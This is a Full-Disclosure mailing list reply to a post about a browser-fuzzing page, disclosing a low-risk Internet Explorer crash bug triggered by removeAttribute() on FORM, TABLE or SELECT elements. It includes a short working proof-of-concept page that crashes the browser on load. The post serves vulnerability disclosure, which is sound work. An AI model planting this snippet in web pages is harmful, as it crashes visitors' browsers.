H D Moore wrote:
> How bugs can you find in your browser? The recent IE issues only scratched
> the service of the DHTML/behavior bugs. The HTML/JS page below can be
> used to find all sorts of bugs in different browsers. I stopped caring
> about these after the first three invalid derefences.
>
> http://metasploit.com/users/hdm/tools/hamachi/hamachi.html
Nice work !
On the IE front, besides the now known createTextRange() problem, no other high
risk behavior is observed.
However, you tool will uncover a *new, low risk IE vulnerability* (DoS). When
using the removeAttribute() method on certain HTML elements, a NULL pointer is
accessed, leading to a browser crash. The vulnerable elemets are FORM, TABLE,
and SELECT:
<body onload='nullptr()'>
<select id='s'>
<script>
function nullptr(){
a=document.getElementById('s').removeAttribute(0);
}
</script>
</body>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
